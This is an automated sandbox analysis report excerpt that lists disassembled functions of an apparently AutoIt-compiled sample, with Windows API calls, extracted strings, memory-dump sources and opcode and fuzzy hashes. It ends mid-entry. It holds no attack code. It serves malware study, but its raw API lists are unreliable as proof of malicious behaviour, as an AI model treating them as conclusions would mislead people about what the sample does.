              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
              • API String ID: 9721498-966354055
              • Opcode ID: d1c50cf91de5fcf7162d8175df4e52af8ebba025115b202dc294a053b0fa2500
              • Instruction ID: 3d1e5a5c1bf9f969cf39678abe4ae1ea190436f0a9e9305c36b4f5bb90e4cf64
              • Opcode Fuzzy Hash: d1c50cf91de5fcf7162d8175df4e52af8ebba025115b202dc294a053b0fa2500
              • Instruction Fuzzy Hash: 041265316043019FDB15DF14C881B6AB7E6EF88714F04889DF88A9B3A2DB75ED45CB86
              Function 0076091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
              Download Yara Rule
              APIs
              • CharUpperBuffW.USER32(?,?), ref: 007609C6
              • _wcslen.LIBCMT ref: 00760A01
              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00760A54
              • _wcslen.LIBCMT ref: 00760A8A
              • _wcslen.LIBCMT ref: 00760B06
              • _wcslen.LIBCMT ref: 00760B81
                • Part of subcall function 006EF9F2: _wcslen.LIBCMT ref: 006EF9FD
                • Part of subcall function 00732BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00732BFA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$MessageSend$BuffCharUpper
              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
              • API String ID: 1103490817-4258414348
              • Opcode ID: b4af81b1ddc4968bd0f79cd10d5f0c44f1160a1528fd0e358bf02ff7ce68ed49
              • Instruction ID: 04dbe636cf8e561c7d453acd2a8e7893e6bc889a1034b387f0f490ce66d3a86b
              • Opcode Fuzzy Hash: b4af81b1ddc4968bd0f79cd10d5f0c44f1160a1528fd0e358bf02ff7ce68ed49
              • Instruction Fuzzy Hash: B1E19B716087018FCB14DF24C45092BB7E2BF98354F148A5DF89A9B3A2DB39ED45CB92
              Function 0075C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$BuffCharUpper
              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
              • API String ID: 1256254125-909552448
              • Opcode ID: de7dfea91e7efa3be898fd113bfdd0781fe4e29cbb1a4b5c8a086a0451928232
              • Instruction ID: f87b5bd4aac68ed4e85dc9caf4e280d90faeda04030946cff4c211237e982e9c
              • Opcode Fuzzy Hash: de7dfea91e7efa3be898fd113bfdd0781fe4e29cbb1a4b5c8a086a0451928232
              • Instruction Fuzzy Hash: 2171163260036A8FCF22DE7CCD417FB37929B61751B244528FC56A7284EAB9CD48C3A4
              Function 0076833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
              Download Yara Rule
              APIs
              • _wcslen.LIBCMT ref: 0076835A
              • _wcslen.LIBCMT ref: 0076836E
              • _wcslen.LIBCMT ref: 00768391
              • _wcslen.LIBCMT ref: 007683B4
              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007683F2
              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00765BF2), ref: 0076844E
              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00768487
              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007684CA
              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00768501
              • FreeLibrary.KERNEL32(?), ref: 0076850D
              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0076851D
              • DestroyIcon.USER32(?,?,?,?,?,00765BF2), ref: 0076852C
              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00768549
              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00768555
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
              • String ID: .dll$.exe$.icl
              • API String ID: 799131459-1154884017
              • Opcode ID: d1ff607b6ce1307a88a1248954ea99055940d1b6e9293a6d181f2625c7cc5108
              • Instruction ID: 9ed7bf26ed66169a14c575a7095c0dc1af235f3b816747f53ebc24dd89417597
              • Opcode Fuzzy Hash: d1ff607b6ce1307a88a1248954ea99055940d1b6e9293a6d181f2625c7cc5108
              • Instruction Fuzzy Hash: E861D171540219BAEB54DF64CC41BBF7BA8FB04711F10860AFD16D61D1DFB8AA50C7A4
              Function 006D7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
              • API String ID: 0-1645009161
              • Opcode ID: 80c22b7a6efac1551a8dd06e7b7b69bfecbb8794799df90a28080f5ca0e33a0a
              • Instruction ID: 38c1538164f9b5bcfe7b821dc5538857447e3ed4f05df522a62635104860f13a
              • Opcode Fuzzy Hash: 80c22b7a6efac1551a8dd06e7b7b69bfecbb8794799df90a28080f5ca0e33a0a
              • Instruction Fuzzy Hash: 978119B1A00209BBDB25AF64DC42FFE3766AF55300F04442AF905AB292FB74D941D7A5
              Function 00735A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
              Download Yara Rule
              APIs
              • LoadIconW.USER32(00000063), ref: 00735A2E
              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00735A40
              • SetWindowTextW.USER32(?,?), ref: 00735A57
              • GetDlgItem.USER32(?,000003EA), ref: 00735A6C
              • SetWindowTextW.USER32(00000000,?), ref: 00735A72
              • GetDlgItem.USER32(?,000003E9), ref: 00735A82
              • SetWindowTextW.USER32(00000000,?), ref: 00735A88
              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00735AA9
              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00735AC3
              • GetWindowRect.USER32(?,?), ref: 00735ACC
              • _wcslen.LIBCMT ref: 00735B33
              • SetWindowTextW.USER32(?,?), ref: 00735B6F
              • GetDesktopWindow.USER32 ref: 00735B75
              • GetWindowRect.USER32(00000000), ref: 00735B7C
              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00735BD3
              • GetClientRect.USER32(?,?), ref: 00735BE0
              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00735C05
              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00735C2F
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
              • String ID:
              • API String ID: 895679908-0
              • Opcode ID: bd7462111b9fd9440a9b398c3dd00e82ef9826fbbcf745ab37f591e42f29a42c
              • Instruction ID: e5fc60b5c4976b6e09ffbd9301ec72b4a315fc50e295a05c331f14811f42206d
              • Opcode Fuzzy Hash: bd7462111b9fd9440a9b398c3dd00e82ef9826fbbcf745ab37f591e42f29a42c
              • Instruction Fuzzy Hash: 79718E71900B09EFEB21DFA8CE85BAEBBF5FF48704F104518E582A25A1D779E940CB54
              Function 007330F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen
              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[y
              • API String ID: 176396367-3387399910
              • Opcode ID: 98a7ece8accede00da7a48507520c300edbb011be0d88278d20f48b12fde8959
              • Instruction ID: 040b674cb789fe72fafa46d0a0cce46a2112abe4a959f54d375696d2b52a7210
              • Opcode Fuzzy Hash: 98a7ece8accede00da7a48507520c300edbb011be0d88278d20f48b12fde8959
              • Instruction Fuzzy Hash: 0FE1E632A005269BEF359FB8C4516FEFBB1BF44710F54812AE456E7242DB38AE4587D0
              Function 006F00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
              Download Yara Rule
              APIs
              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 006F00C6
                • Part of subcall function 006F00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(007A070C,00000FA0,B85C0925,?,?,?,?,007123B3,000000FF), ref: 006F011C
                • Part of subcall function 006F00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,007123B3,000000FF), ref: 006F0127
                • Part of subcall function 006F00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,007123B3,000000FF), ref: 006F0138
                • Part of subcall function 006F00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006F014E
                • Part of subcall function 006F00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006F015C
                • Part of subcall function 006F00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006F016A
                • Part of subcall function 006F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006F0195
                • Part of subcall function 006F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006F01A0
              • ___scrt_fastfail.LIBCMT ref: 006F00E7
                • Part of subcall function 006F00A3: __onexit.LIBCMT ref: 006F00A9
              Strings
              • kernel32.dll, xrefs: 006F0133
              • WakeAllConditionVariable, xrefs: 006F0162
              • InitializeConditionVariable, xrefs: 006F0148
              • SleepConditionVariableCS, xrefs: 006F0154
              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 006F0122
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
              • API String ID: 66158676-1714406822
              • Opcode ID: 6bd65af9ed493c8fa03855f3d70aad972db18e670e984b24461f714dbbb2fee1
              • Instruction ID: e24a7f522972086bf83ff5013222f03e4ca6482920ad853d092288d3f28995da
              • Opcode Fuzzy Hash: 6bd65af9ed493c8fa03855f3d70aad972db18e670e984b24461f714dbbb2fee1
              • Instruction Fuzzy Hash: D1210E726457196BFB11ABF4AC05B7A3396EB46B51F104539FD0293392DFBC6C008A98
              Function 007444C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
              Download Yara Rule
              APIs
              • CharLowerBuffW.USER32(00000000,00000000,0076CC08), ref: 00744527
              • _wcslen.LIBCMT ref: 0074453B
              • _wcslen.LIBCMT ref: 00744599
              • _wcslen.LIBCMT ref: 007445F4
              • _wcslen.LIBCMT ref: 0074463F
              • _wcslen.LIBCMT ref: 007446A7
                • Part of subcall function 006EF9F2: _wcslen.LIBCMT ref: 006EF9FD
              • GetDriveTypeW.KERNEL32(?,00796BF0,00000061), ref: 00744743
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$BuffCharDriveLowerType
              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
              • API String ID: 2055661098-1000479233
              • Opcode ID: 2ff707f14f4fd79194ab6d13c4dbddac39cc9da941895c77acb8ac107f70ef58
              • Instruction ID: f34687a7da7809d218eba8213f9a73587bcce700bb4f577d60b9a33e96ab7d58
              • Opcode Fuzzy Hash: 2ff707f14f4fd79194ab6d13c4dbddac39cc9da941895c77acb8ac107f70ef58
              • Instruction Fuzzy Hash: D0B1F2716083029FC710DF28D890A7AB7E5BFA6760F504A1DF496C7291EB38D845DBA2
              Function 0076911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
              • DragQueryPoint.SHELL32(?,?), ref: 00769147
                • Part of subcall function 00767674: ClientToScreen.USER32(?,?), ref: 0076769A
                • Part of subcall function 00767674: GetWindowRect.USER32(?,?), ref: 00767710
                • Part of subcall function 00767674: PtInRect.USER32(?,?,00768B89), ref: 00767720
              • SendMessageW.USER32(?,000000B0,?,?), ref: 007691B0
              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007691BB
              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007691DE
              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00769225
              • SendMessageW.USER32(?,000000B0,?,?), ref: 0076923E
              • SendMessageW.USER32(?,000000B1,?,?), ref: 00769255
              • SendMessageW.USER32(?,000000B1,?,?), ref: 00769277
              • DragFinish.SHELL32(?), ref: 0076927E
              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00769371
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#z
              • API String ID: 221274066-3231298687
              • Opcode ID: 756ad91427686e561ccce6e17cecd414268d9a8f7f0373d83dae252c36d10f58
              • Instruction ID: 20594622f7e8b337e6cbfa15bc3dedc2908bf26f51c96fc560a9fcf049e175f2
              • Opcode Fuzzy Hash: 756ad91427686e561ccce6e17cecd414268d9a8f7f0373d83dae252c36d10f58
              • Instruction Fuzzy Hash: 8E619B71508301AFC701DF60DC85DAFBBE9EFC9750F00492EF596922A0DB749A09CB66
              Function 0075AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
              Download Yara Rule
              APIs
              • _wcslen.LIBCMT ref: 0075B198
              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0075B1B0
              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0075B1D4
              • _wcslen.LIBCMT ref: 0075B200
              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0075B214
              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0075B236
              • _wcslen.LIBCMT ref: 0075B332
                • Part of subcall function 007405A7: GetStdHandle.KERNEL32(000000F6), ref: 007405C6
              • _wcslen.LIBCMT ref: 0075B34B
              • _wcslen.LIBCMT ref: 0075B366
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0075B3B6
              • GetLastError.KERNEL32(00000000), ref: 0075B407
              • CloseHandle.KERNEL32(?), ref: 0075B439
              • CloseHandle.KERNEL32(00000000), ref: 0075B44A
              • CloseHandle.KERNEL32(00000000), ref: 0075B45C
              • CloseHandle.KERNEL32(00000000), ref: 0075B46E
              • CloseHandle.KERNEL32(?), ref: 0075B4E3
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
              • String ID:
              • API String ID: 2178637699-0
              • Opcode ID: d0b68ff7c879947a88f8e8f596d8488af06611e9f8ae9b90255fec9043e22441
              • Instruction ID: 8a069dc9506b9730d9e87a6e3fe8491c36a3174ce7ac5b834e27a111a506f05e
              • Opcode Fuzzy Hash: d0b68ff7c879947a88f8e8f596d8488af06611e9f8ae9b90255fec9043e22441
              • Instruction Fuzzy Hash: C7F18C31604340DFC764EF24C891B6EBBE1AF85310F14855EF8999B2A2DB75EC48CB96
              Function 006D326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
              Download Yara Rule
              APIs
              • GetMenuItemCount.USER32(007A1990), ref: 00712F8D
              • GetMenuItemCount.USER32(007A1990), ref: 0071303D
              • GetCursorPos.USER32(?), ref: 00713081
              • SetForegroundWindow.USER32(00000000), ref: 0071308A
              • TrackPopupMenuEx.USER32(007A1990,00000000,?,00000000,00000000,00000000), ref: 0071309D
              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007130A9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
              • String ID: 0
              • API String ID: 36266755-4108050209
              • Opcode ID: 48c1bc70b071fdbbcfdfe5dda439fcff4eb2da154057c46928184aaa816b0f13
              • Instruction ID: 312b12dc30439dbbb5635d9f7e9a28ea5d2ad112ed8205ad4770f427095123e0
              • Opcode Fuzzy Hash: 48c1bc70b071fdbbcfdfe5dda439fcff4eb2da154057c46928184aaa816b0f13
              • Instruction Fuzzy Hash: FB712A70A44215BEFB218F28CC49FEABF69FF04324F204207F5156A2E1C7B9A965CB55
              Function 00766CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
              Download Yara Rule
              APIs
              • DestroyWindow.USER32(?,?), ref: 00766DEB
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00766E5F
              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00766E81
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00766E94
              • DestroyWindow.USER32(?), ref: 00766EB5
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,006D0000,00000000), ref: 00766EE4
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00766EFD
              • GetDesktopWindow.USER32 ref: 00766F16
              • GetWindowRect.USER32(00000000), ref: 00766F1D
              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00766F35
              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00766F4D
                • Part of subcall function 006E9944: GetWindowLongW.USER32(?,000000EB), ref: 006E9952
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
              • String ID: 0$tooltips_class32
              • API String ID: 2429346358-3619404913
              • Opcode ID: 191b8d542b2494c2e41f250a23be50da6f5f320f2bbf34e9c88cdaa78826e270
              • Instruction ID: d87ebba7d47b521b59e25487d28d154e75642803ade32e3ee881fafeca5263a7
              • Opcode Fuzzy Hash: 191b8d542b2494c2e41f250a23be50da6f5f320f2bbf34e9c88cdaa78826e270
              • Instruction Fuzzy Hash: D2716674104340AFEB21CF18D844EBABBE9FB99304F84445EF99A87261C779E916CB19
              Function 0074C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
              Download Yara Rule
              APIs
              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0074C4B0
              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0074C4C3
              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0074C4D7
              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0074C4F0
              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0074C533
              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0074C549
              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0074C554
              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0074C584
              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0074C5DC
              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0074C5F0
              • InternetCloseHandle.WININET(00000000), ref: 0074C5FB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
              • String ID:
              • API String ID: 3800310941-3916222277
              • Opcode ID: d3eaba74513dce57d48ef928219fc7d48b4ce0d210665a889e09e64584309048
              • Instruction ID: c7cd51456fce75c2fe57731f67fd84d72ab91f73504c1b401c987aa4210b7f58
